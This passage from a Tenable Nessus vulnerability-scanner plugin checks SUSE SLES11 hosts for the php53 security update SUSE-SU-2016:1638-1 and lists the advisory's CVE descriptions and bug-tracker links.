Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1638-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93161);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2004-1019\", \"CVE-2006-7243\", \"CVE-2014-0207\", \"CVE-2014-3478\", \"CVE-2014-3479\", \"CVE-2014-3480\", \"CVE-2014-3487\", \"CVE-2014-3515\", \"CVE-2014-3597\", \"CVE-2014-3668\", \"CVE-2014-3669\", \"CVE-2014-3670\", \"CVE-2014-4049\", \"CVE-2014-4670\", \"CVE-2014-4698\", \"CVE-2014-4721\", \"CVE-2014-5459\", \"CVE-2014-8142\", \"CVE-2014-9652\", \"CVE-2014-9705\", \"CVE-2014-9709\", \"CVE-2014-9767\", \"CVE-2015-0231\", \"CVE-2015-0232\", \"CVE-2015-0273\", \"CVE-2015-1352\", \"CVE-2015-2301\", \"CVE-2015-2305\", \"CVE-2015-2783\", \"CVE-2015-2787\", \"CVE-2015-3152\", \"CVE-2015-3329\", \"CVE-2015-3411\", \"CVE-2015-3412\", \"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4026\", \"CVE-2015-4116\", \"CVE-2015-4148\", \"CVE-2015-4598\", \"CVE-2015-4599\", \"CVE-2015-4600\", \"CVE-2015-4601\", \"CVE-2015-4602\", \"CVE-2015-4603\", \"CVE-2015-4643\", \"CVE-2015-4644\", \"CVE-2015-5161\", \"CVE-2015-5589\", \"CVE-2015-5590\", \"CVE-2015-6831\", \"CVE-2015-6833\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\", \"CVE-2015-7803\", \"CVE-2015-8835\", \"CVE-2015-8838\", \"CVE-2015-8866\", \"CVE-2015-8867\", \"CVE-2015-8873\", \"CVE-2015-8874\", \"CVE-2015-8879\", \"CVE-2016-2554\", \"CVE-2016-3141\", \"CVE-2016-3142\", \"CVE-2016-3185\", \"CVE-2016-4070\", \"CVE-2016-4073\", \"CVE-2016-4342\", \"CVE-2016-4346\", \"CVE-2016-4537\", \"CVE-2016-4538\", \"CVE-2016-4539\", \"CVE-2016-4540\", \"CVE-2016-4541\", \"CVE-2016-4542\", \"CVE-2016-4543\", \"CVE-2016-4544\", \"CVE-2016-5093\", \"CVE-2016-5094\", 
\"CVE-2016-5095\", \"CVE-2016-5096\", \"CVE-2016-5114\");\n script_bugtraq_id(44951, 68007, 68120, 68237, 68238, 68239, 68241, 68243, 68423, 68511, 68513, 69322, 69388, 70611, 70665, 70666, 71791, 71932, 72505, 72539, 72541, 72611, 72701, 73031, 73037, 73306, 73431, 74239, 74240, 74398, 74413, 74700, 74902, 74903, 75056, 75103, 75244, 75246, 75249, 75250, 75251, 75252, 75255, 75291, 75292, 75970, 75974);\n\n script_name(english:\"SUSE SLES11 Security Update : php53 (SUSE-SU-2016:1638-1) (BACKRONYM)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for php53 to version 5.3.17 fixes the following issues :\n\nThese security issues were fixed :\n\n - CVE-2016-5093: get_icu_value_internal out-of-bounds read\n (bnc#982010).\n\n - CVE-2016-5094: Don't create strings with lengths outside\n int range (bnc#982011).\n\n - CVE-2016-5095: Don't create strings with lengths outside\n int range (bnc#982012).\n\n - CVE-2016-5096: int/size_t confusion in fread\n (bsc#982013).\n\n - CVE-2016-5114: fpm_log.c memory leak and buffer overflow\n (bnc#982162).\n\n - CVE-2015-8879: The odbc_bindcols function in\n ext/odbc/php_odbc.c in PHP mishandles driver behavior\n for SQL_WVARCHAR columns, which allowed remote attackers\n to cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the\n odbc_fetch_array function to access a certain type of\n Microsoft SQL Server table (bsc#981050).\n\n - CVE-2015-4116: Use-after-free vulnerability in the\n spl_ptr_heap_insert function in ext/spl/spl_heap.c in\n PHP allowed remote attackers to execute arbitrary code\n by triggering a failed SplMinHeap::compare operation\n (bsc#980366).\n\n - CVE-2015-8874: Stack consumption vulnerability in GD in\n PHP allowed remote attackers 
to cause a denial of\n service via a crafted imagefilltoborder call\n (bsc#980375).\n\n - CVE-2015-8873: Stack consumption vulnerability in\n Zend/zend_exceptions.c in PHP allowed remote attackers\n to cause a denial of service (segmentation fault) via\n recursive method calls (bsc#980373).\n\n - CVE-2016-4540: The grapheme_stripos function in\n ext/intl/grapheme/grapheme_string.c in PHP allowed\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a negative offset (bsc#978829).\n\n - CVE-2016-4541: The grapheme_strpos function in\n ext/intl/grapheme/grapheme_string.c in PHP allowed\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a negative offset (bsc#978829.\n\n - CVE-2016-4542: The exif_process_IFD_TAG function in\n ext/exif/exif.c in PHP did not properly construct\n spprintf arguments, which allowed remote attackers to\n cause a denial of service (out-of-bounds read) or\n possibly have unspecified other impact via crafted\n header data (bsc#978830).\n\n - CVE-2016-4543: The exif_process_IFD_in_JPEG function in\n ext/exif/exif.c in PHP did not validate IFD sizes, which\n allowed remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via crafted header data (bsc#978830.\n\n - CVE-2016-4544: The exif_process_TIFF_in_JPEG function in\n ext/exif/exif.c in PHP did not validate TIFF start data,\n which allowed remote attackers to cause a denial of\n service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header data\n (bsc#978830.\n\n - CVE-2016-4537: The bcpowmod function in\n ext/bcmath/bcmath.c in PHP accepted a negative integer\n for the scale argument, which allowed remote attackers\n to cause a denial of service or possibly have\n unspecified other impact via a crafted call\n (bsc#978827).\n\n - CVE-2016-4538: The bcpowmod function in\n 
ext/bcmath/bcmath.c in PHP modified certain data\n structures without considering whether they are copies\n of the _zero_, _one_, or _two_ global variable, which\n allowed remote attackers to cause a denial of service or\n possibly have unspecified other impact via a crafted\n call (bsc#978827).\n\n - CVE-2016-4539: The xml_parse_into_struct function in\n ext/xml/xml.c in PHP allowed remote attackers to cause a\n denial of service (buffer under-read and segmentation\n fault) or possibly have unspecified other impact via\n crafted XML data in the second argument, leading to a\n parser level of zero (bsc#978828).\n\n - CVE-2016-4342: ext/phar/phar_object.c in PHP mishandles\n zero-length uncompressed data, which allowed remote\n attackers to cause a denial of service (heap memory\n corruption) or possibly have unspecified other impact\n via a crafted (1) TAR, (2) ZIP, or (3) PHAR archive\n (bsc#977991).\n\n - CVE-2016-4346: Integer overflow in the str_pad function\n in ext/standard/string.c in PHP allowed remote attackers\n to cause a denial of service or possibly have\n unspecified other impact via a long string, leading to a\n heap-based buffer overflow (bsc#977994).\n\n - CVE-2016-4073: Multiple integer overflows in the\n mbfl_strcut function in\n ext/mbstring/libmbfl/mbfl/mbfilter.c in PHP allowed\n remote attackers to cause a denial of service\n (application crash) or possibly execute arbitrary code\n via a crafted mb_strcut call (bsc#977003).\n\n - CVE-2015-8867: The openssl_random_pseudo_bytes function\n in ext/openssl/openssl.c in PHP incorrectly relied on\n the deprecated RAND_pseudo_bytes function, which made it\n easier for remote attackers to defeat cryptographic\n protection mechanisms via unspecified vectors\n (bsc#977005).\n\n - CVE-2016-4070: Integer overflow in the\n php_raw_url_encode function in ext/standard/url.c in PHP\n allowed remote attackers to cause a denial of service\n (application crash) via a long string to the\n rawurlencode function 
(bsc#976997).\n\n - CVE-2015-8866: ext/libxml/libxml.c in PHP when PHP-FPM\n is used, did not isolate each thread from\n libxml_disable_entity_loader changes in other threads,\n which allowed remote attackers to conduct XML External\n Entity (XXE) and XML Entity Expansion (XEE) attacks via\n a crafted XML document, a related issue to CVE-2015-5161\n (bsc#976996).\n\n - CVE-2015-8838: ext/mysqlnd/mysqlnd.c in PHP used a\n client SSL option to mean that SSL is optional, which\n allowed man-in-the-middle attackers to spoof servers via\n a cleartext-downgrade attack, a related issue to\n CVE-2015-3152 (bsc#973792).\n\n - CVE-2015-8835: The make_http_soap_request function in\n ext/soap/php_http.c in PHP did not properly retrieve\n keys, which allowed remote attackers to cause a denial\n of service (NULL pointer dereference, type confusion,\n and application crash) or possibly execute arbitrary\n code via crafted serialized data representing a\n numerically indexed _cookies array, related to the\n SoapClient::__call method in ext/soap/soap.c\n (bsc#973351).\n\n - CVE-2016-3141: Use-after-free vulnerability in wddx.c in\n the WDDX extension in PHP allowed remote attackers to\n cause a denial of service (memory corruption and\n application crash) or possibly have unspecified other\n impact by triggering a wddx_deserialize call on XML data\n containing a crafted var element (bsc#969821).\n\n - CVE-2016-3142: The phar_parse_zipfile function in zip.c\n in the PHAR extension in PHP allowed remote attackers to\n obtain sensitive information from process memory or\n cause a denial of service (out-of-bounds read and\n application crash) by placing a PK\\x05\\x06 signature at\n an invalid location (bsc#971912).\n\n - CVE-2014-9767: Directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c in\n PHP ext/zip/ext_zip.cpp in HHVM allowed remote attackers\n to create arbitrary empty directories via a crafted ZIP\n archive (bsc#971612).\n\n - 
CVE-2016-3185: The make_http_soap_request function in\n ext/soap/php_http.c in PHP allowed remote attackers to\n obtain sensitive information from process memory or\n cause a denial of service (type confusion and\n application crash) via crafted serialized _cookies data,\n related to the SoapClient::__call method in\n ext/soap/soap.c (bsc#971611).\n\n - CVE-2016-2554: Stack-based buffer overflow in\n ext/phar/tar.c in PHP allowed remote attackers to cause\n a denial of service (application crash) or possibly have\n unspecified other impact via a crafted TAR archive\n (bsc#968284).\n\n - CVE-2015-7803: The phar_get_entry_data function in\n ext/phar/util.c in PHP allowed remote attackers to cause\n a denial of service (NULL pointer dereference and\n application crash) via a .phar file with a crafted TAR\n archive entry in which the Link indicator references a\n file that did not exist (bsc#949961).\n\n - CVE-2015-6831: Multiple use-after-free vulnerabilities\n in SPL in PHP allowed remote attackers to execute\n arbitrary code via vectors involving (1) ArrayObject,\n (2) SplObjectStorage, and (3) SplDoublyLinkedList, which\n are mishandled during unserialization (bsc#942291).\n\n - CVE-2015-6833: Directory traversal vulnerability in the\n PharData class in PHP allowed remote attackers to write\n to arbitrary files via a .. 
(dot dot) in a ZIP archive\n entry that is mishandled during an extractTo call\n (bsc#942296.\n\n - CVE-2015-6836: The SoapClient __call method in\n ext/soap/soap.c in PHP did not properly manage headers,\n which allowed remote attackers to execute arbitrary code\n via crafted serialized data that triggers a 'type\n confusion' in the serialize_function_call function\n (bsc#945428).\n\n - CVE-2015-6837: The xsl_ext_function_php function in\n ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did\n not consider the possibility of a NULL valuePop return\n value proceeding with a free operation during initial\n error checking, which allowed remote attackers to cause\n a denial of service (NULL pointer dereference and\n application crash) via a crafted XML document, a\n different vulnerability than CVE-2015-6838 (bsc#945412).\n\n - CVE-2015-6838: The xsl_ext_function_php function in\n ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did\n not consider the possibility of a NULL valuePop return\n value proceeding with a free operation after the\n principal argument loop, which allowed remote attackers\n to cause a denial of service (NULL pointer dereference\n and application crash) via a crafted XML document, a\n different vulnerability than CVE-2015-6837 (bsc#945412).\n\n - CVE-2015-5590: Stack-based buffer overflow in the\n phar_fix_filepath function in ext/phar/phar.c in PHP\n allowed remote attackers to cause a denial of service or\n possibly have unspecified other impact via a large\n length value, as demonstrated by mishandling of an\n e-mail attachment by the imap PHP extension\n (bsc#938719).\n\n - CVE-2015-5589: The phar_convert_to_other function in\n ext/phar/phar_object.c in PHP did not validate a file\n pointer a close operation, which allowed remote\n attackers to cause a denial of service (segmentation\n fault) or possibly have unspecified other impact via a\n crafted TAR archive that is mishandled in a\n Phar::convertToData call (bsc#938721).\n\n - 
CVE-2015-4602: The __PHP_Incomplete_Class function in\n ext/standard/incomplete_class.c in PHP allowed remote\n attackers to cause a denial of service (application\n crash) or possibly execute arbitrary code via an\n unexpected data type, related to a 'type confusion'\n issue (bsc#935224).\n\n - CVE-2015-4599: The SoapFault::__toString method in\n ext/soap/soap.c in PHP allowed remote attackers to\n obtain sensitive information, cause a denial of service\n (application crash), or possibly execute arbitrary code\n via an unexpected data type, related to a 'type\n confusion' issue (bsc#935226).\n\n - CVE-2015-4600: The SoapClient implementation in PHP\n allowed remote attackers to cause a denial of service\n (application crash) or possibly execute arbitrary code\n via an unexpected data type, related to 'type confusion'\n issues in the (1) SoapClient::__getLastRequest, (2)\n SoapClient::__getLastResponse, (3)\n SoapClient::__getLastRequestHeaders, (4)\n SoapClient::__getLastResponseHeaders, (5)\n SoapClient::__getCookies, and (6)\n SoapClient::__setCookie methods (bsc#935226).\n\n - CVE-2015-4601: PHP allowed remote attackers to cause a\n denial of service (application crash) or possibly\n execute arbitrary code via an unexpected data type,\n related to 'type confusion' issues in (1)\n ext/soap/php_encoding.c, (2) ext/soap/php_http.c, and\n (3) ext/soap/soap.c, a different issue than\n CVE-2015-4600 (bsc#935226.\n\n - CVE-2015-4603: The exception::getTraceAsString function\n in Zend/zend_exceptions.c in PHP allowed remote\n attackers to execute arbitrary code via an unexpected\n data type, related to a 'type confusion' issue\n (bsc#935234).\n\n - CVE-2015-4644: The php_pgsql_meta_data function in\n pgsql.c in the PostgreSQL (aka pgsql) extension in PHP\n did not validate token extraction for table names, which\n might allowed remote attackers to cause a denial of\n service (NULL pointer dereference and application crash)\n via a crafted name. 
NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2015-1352\n (bsc#935274).\n\n - CVE-2015-4643: Integer overflow in the ftp_genlist\n function in ext/ftp/ftp.c in PHP allowed remote FTP\n servers to execute arbitrary code via a long reply to a\n LIST command, leading to a heap-based buffer overflow.\n NOTE: this vulnerability exists because of an incomplete\n fix for CVE-2015-4022 (bsc#935275).\n\n - CVE-2015-3411: PHP did not ensure that pathnames lack\n %00 sequences, which might have allowed remote attackers\n to read or write to arbitrary files via crafted input to\n an application that calls (1) a DOMDocument load method,\n (2) the xmlwriter_open_uri function, (3) the finfo_file\n function, or (4) the hash_hmac_file function, as\n demonstrated by a filename\\0.xml attack that bypasses an\n intended configuration in which client users may read\n only .xml files (bsc#935227).\n\n - CVE-2015-3412: PHP did not ensure that pathnames lack\n %00 sequences, which might have allowed remote attackers\n to read arbitrary files via crafted input to an\n application that calls the stream_resolve_include_path\n function in ext/standard/streamsfuncs.c, as demonstrated\n by a filename\\0.extension attack that bypasses an\n intended configuration in which client users may read\n files with only one specific extension (bsc#935229).\n\n - CVE-2015-4598: PHP did not ensure that pathnames lack\n %00 sequences, which might have allowed remote attackers\n to read or write to arbitrary files via crafted input to\n an application that calls (1) a DOMDocument save method\n or (2) the GD imagepsloadfont function, as demonstrated\n by a filename\\0.html attack that bypasses an intended\n configuration in which client users may write to only\n .html files (bsc#935232).\n\n - CVE-2015-4148: The do_soap_call function in\n ext/soap/soap.c in PHP did not verify that the uri\n property is a string, which allowed remote attackers to\n obtain sensitive information by 
providing crafted\n serialized data with an int data type, related to a\n 'type confusion' issue (bsc#933227).\n\n - CVE-2015-4024: Algorithmic complexity vulnerability in\n the multipart_buffer_headers function in main/rfc1867.c\n in PHP allowed remote attackers to cause a denial of\n service (CPU consumption) via crafted form data that\n triggers an improper order-of-growth outcome\n (bsc#931421).\n\n - CVE-2015-4026: The pcntl_exec implementation in PHP\n truncates a pathname upon encountering a \\x00 character,\n which might allowed remote attackers to bypass intended\n extension restrictions and execute files with unexpected\n names via a crafted first argument. NOTE: this\n vulnerability exists because of an incomplete fix for\n CVE-2006-7243 (bsc#931776).\n\n - CVE-2015-4022: Integer overflow in the ftp_genlist\n function in ext/ftp/ftp.c in PHP allowed remote FTP\n servers to execute arbitrary code via a long reply to a\n LIST command, leading to a heap-based buffer overflow\n (bsc#931772).\n\n - CVE-2015-4021: The phar_parse_tarfile function in\n ext/phar/tar.c in PHP did not verify that the first\n character of a filename is different from the \\0\n character, which allowed remote attackers to cause a\n denial of service (integer underflow and memory\n corruption) via a crafted entry in a tar archive\n (bsc#931769).\n\n - CVE-2015-3329: Multiple stack-based buffer overflows in\n the phar_set_inode function in phar_internal.h in PHP\n allowed remote attackers to execute arbitrary code via a\n crafted length value in a (1) tar, (2) phar, or (3) ZIP\n archive (bsc#928506).\n\n - CVE-2015-2783: ext/phar/phar.c in PHP allowed remote\n attackers to obtain sensitive information from process\n memory or cause a denial of service (buffer over-read\n and application crash) via a crafted length value in\n conjunction with crafted serialized data in a phar\n archive, related to the phar_parse_metadata and\n phar_parse_pharfile functions (bsc#928511).\n\n - 
CVE-2015-2787: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted\n unserialize call that leverages use of the unset\n function within an __wakeup function, a related issue to\n CVE-2015-0231 (bsc#924972).\n\n - CVE-2014-9709: The GetCode_ function in gd_gif_in.c in\n GD 2.1.1 and earlier, as used in PHP allowed remote\n attackers to cause a denial of service (buffer over-read\n and application crash) via a crafted GIF image that is\n improperly handled by the gdImageCreateFromGif function\n (bsc#923945).\n\n - CVE-2015-2301: Use-after-free vulnerability in the\n phar_rename_archive function in phar_object.c in PHP\n allowed remote attackers to cause a denial of service or\n possibly have unspecified other impact via vectors that\n trigger an attempted renaming of a Phar archive to the\n name of an existing file (bsc#922452).\n\n - CVE-2015-2305: Integer overflow in the regcomp\n implementation in the Henry Spencer BSD regex library\n (aka rxspencer) 32-bit platforms might have allowed\n context-dependent attackers to execute arbitrary code\n via a large regular expression that leads to a\n heap-based buffer overflow (bsc#921950).\n\n - CVE-2014-9705: Heap-based buffer overflow in the\n enchant_broker_request_dict function in\n ext/enchant/enchant.c in PHP allowed remote attackers to\n execute arbitrary code via vectors that trigger creation\n of multiple dictionaries (bsc#922451).\n\n - CVE-2015-0273: Multiple use-after-free vulnerabilities\n in ext/date/php_date.c in PHP allowed remote attackers\n to execute arbitrary code via crafted serialized input\n containing a (1) R or (2) r type specifier in (a)\n DateTimeZone data handled by the\n php_date_timezone_initialize_from_hash function or (b)\n DateTime data handled by the\n php_date_initialize_from_hash function (bsc#918768).\n\n - CVE-2014-9652: The mconvert function in softmagic.c 
in\n file as used in the Fileinfo component in PHP did not\n properly handle a certain string-length field during a\n copy of a truncated version of a Pascal string, which\n might allowed remote attackers to cause a denial of\n service (out-of-bounds memory access and application\n crash) via a crafted file (bsc#917150).\n\n - CVE-2014-8142: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate keys within the serialized properties of an\n object, a different vulnerability than CVE-2004-1019\n (bsc#910659).\n\n - CVE-2015-0231: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate numerical keys within the serialized\n properties of an object. 
NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2014-8142\n (bsc#910659).\n\n - CVE-2014-8142: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate keys within the serialized properties of an\n object, a different vulnerability than CVE-2004-1019\n (bsc#910659).\n\n - CVE-2015-0232: The exif_process_unicode function in\n ext/exif/exif.c in PHP allowed remote attackers to\n execute arbitrary code or cause a denial of service\n (uninitialized pointer free and application crash) via\n crafted EXIF data in a JPEG image (bsc#914690).\n\n - CVE-2014-3670: The exif_ifd_make_value function in\n exif.c in the EXIF extension in PHP operates on\n floating-point arrays incorrectly, which allowed remote\n attackers to cause a denial of service (heap memory\n corruption and application crash) or possibly execute\n arbitrary code via a crafted JPEG image with TIFF\n thumbnail data that is improperly handled by the\n exif_thumbnail function (bsc#902357).\n\n - CVE-2014-3669: Integer overflow in the object_custom\n function in ext/standard/var_unserializer.c in PHP\n allowed remote attackers to cause a denial of service\n (application crash) or possibly execute arbitrary code\n via an argument to the unserialize function that\n triggers calculation of a large length value\n (bsc#902360).\n\n - CVE-2014-3668: Buffer overflow in the date_from_ISO8601\n function in the mkgmtime implementation in\n libxmlrpc/xmlrpc.c in the XMLRPC extension in PHP\n allowed remote attackers to cause a denial of service\n (application crash) via (1) a crafted first argument to\n the xmlrpc_set_type function or (2) a crafted argument\n to the xmlrpc_decode function, related to an\n out-of-bounds read operation (bsc#902368).\n\n - CVE-2014-5459: The PEAR_REST class in REST.php in PEAR\n in PHP 
allowed local users to write to arbitrary files\n via a symlink attack on a (1) rest.cachefile or (2)\n rest.cacheid file in /tmp/pear/cache/, related to the\n retrieveCacheFirst and useLocalCache functions\n (bsc#893849).\n\n - CVE-2014-3597: Multiple buffer overflows in the\n php_parserr function in ext/standard/dns.c in PHP\n allowed remote DNS servers to cause a denial of service\n (application crash) or possibly execute arbitrary code\n via a crafted DNS record, related to the dns_get_record\n function and the dn_expand function. NOTE: this issue\n exists because of an incomplete fix for CVE-2014-4049\n (bsc#893853).\n\n - CVE-2014-4670: Use-after-free vulnerability in\n ext/spl/spl_dllist.c in the SPL component in PHP allowed\n context-dependent attackers to cause a denial of service\n or possibly have unspecified other impact via crafted\n iterator usage within applications in certain\n web-hosting environments (bsc#886059).\n\n - CVE-2014-4698: Use-after-free vulnerability in\n ext/spl/spl_array.c in the SPL component in PHP allowed\n context-dependent attackers to cause a denial of service\n or possibly have unspecified other impact via crafted\n ArrayIterator usage within applications in certain\n web-hosting environments (bsc#886060).\n\n - CVE-2014-4721: The phpinfo implementation in\n ext/standard/info.c in PHP did not ensure use of the\n string data type for the PHP_AUTH_PW, PHP_AUTH_TYPE,\n PHP_AUTH_USER, and PHP_SELF variables, which might\n allowed context-dependent attackers to obtain sensitive\n information from process memory by using the integer\n data type with crafted values, related to a 'type\n confusion' vulnerability, as demonstrated by reading a\n private SSL key in an Apache HTTP Server web-hosting\n environment with mod_ssl and a PHP 5.3.x mod_php\n (bsc#885961).\n\n - CVE-2014-0207: The cdf_read_short_sector function in\n cdf.c in file as used in the Fileinfo component in PHP\n allowed remote attackers to cause a denial of service\n 
(assertion failure and application exit) via a crafted\n CDF file (bsc#884986).\n\n - CVE-2014-3478: Buffer overflow in the mconvert function\n in softmagic.c in file as used in the Fileinfo component\n in PHP allowed remote attackers to cause a denial of\n service (application crash) via a crafted Pascal string\n in a FILE_PSTRING conversion (bsc#884987).\n\n - CVE-2014-3479: The cdf_check_stream_offset function in\n cdf.c in file as used in the Fileinfo component in PHP\n relies on incorrect sector-size data, which allowed\n remote attackers to cause a denial of service\n (application crash) via a crafted stream offset in a CDF\n file (bsc#884989).\n\n - CVE-2014-3480: The cdf_count_chain function in cdf.c in\n file as used in the Fileinfo component in PHP did not\n properly validate sector-count data, which allowed\n remote attackers to cause a denial of service\n (application crash) via a crafted CDF file (bsc#884990).\n\n - CVE-2014-3487: The cdf_read_property_info function in\n file as used in the Fileinfo component in PHP did not\n properly validate a stream offset, which allowed remote\n attackers to cause a denial of service (application\n crash) via a crafted CDF file (bsc#884991).\n\n - CVE-2014-3515: The SPL component in PHP incorrectly\n anticipates that certain data structures will have the\n array data type after unserialization, which allowed\n remote attackers to execute arbitrary code via a crafted\n string that triggers use of a Hashtable destructor,\n related to 'type confusion' issues in (1) ArrayObject\n and (2) SPLObjectStorage (bsc#884992).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=884986\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=884987\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=884989\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=884990\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=884991\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=884992\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=885961\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=886059\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=886060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=893849\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=893853\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=902357\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=902360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=902368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=910659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=914690\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=917150\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=918768\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=919080\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=921950\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=922451\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=922452\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=923945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=924972\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=925109\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=928506\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=928511\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931421\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931772\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931776\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933227\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935074\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935224\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935226\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935227\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935229\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935232\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935234\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935274\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935275\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=938719\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=938721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942291\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942296\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=945412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=945428\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=949961\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968284\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 